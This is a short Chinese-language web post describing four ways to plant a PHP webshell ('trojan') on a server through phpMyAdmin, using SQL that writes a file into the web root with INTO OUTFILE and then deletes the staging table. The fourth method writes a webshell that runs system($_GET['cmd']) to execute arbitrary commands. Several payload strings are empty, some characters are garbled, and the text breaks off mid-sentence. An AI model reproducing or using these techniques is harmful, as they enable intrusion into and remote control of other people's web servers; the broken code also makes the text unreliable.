phpmyadmin導(dǎo)出木馬的四種方法

網(wǎng)站中木馬了怎么辦?有沒有好的處理方法?本人總結(jié)的phpmyadmin導(dǎo)出木馬的四種方法:

方法一:

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES (”);SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE ‘d:/wamp/www/exehack.php’;DROP TABLE IF EXISTS `darkmoon`;

以上代碼意思就是選擇musql數(shù)據(jù)庫 然后建立一個(gè)darkmoon的表然后加入一個(gè)名字為darkmoon1的字段

然后在darkmoon1的字段中插入一句話代碼

立即學(xué)習(xí)PHP免費(fèi)學(xué)習(xí)筆記(深入)”;

然后從darkmoon1字段里面導(dǎo)出一句話到d:/wamp/www/exehack.php 的文件名(這里的路徑就是網(wǎng)站的程序路徑)

最后就是刪除darkmoon這個(gè)表。

方法二:

Create TABLE moon (darkmoon text NOT NULL);? ???Insert INTO moon (darkmoon) VALUES(”);? ?? ?? ???select darkmoon from moon into outfile ‘d:/wamp/www/exehack.php’;? ?? ?? ?? ?Drop TABLE IF EXISTS moon;

方法三:

select ”INTO OUTFILE ‘d:/wamp/www/exehack.php’

方法四:

select ”;system($_GET[‘cmd’]); echo ”; ?>’ INTO OUTFILE ‘d:/wamp/www/exehack.php’

這個(gè)可以直接執(zhí)行cmd命令,參數(shù)為cmd

以上就是

? 版權(quán)聲明
THE END
喜歡就支持一下吧
點(diǎn)贊9 分享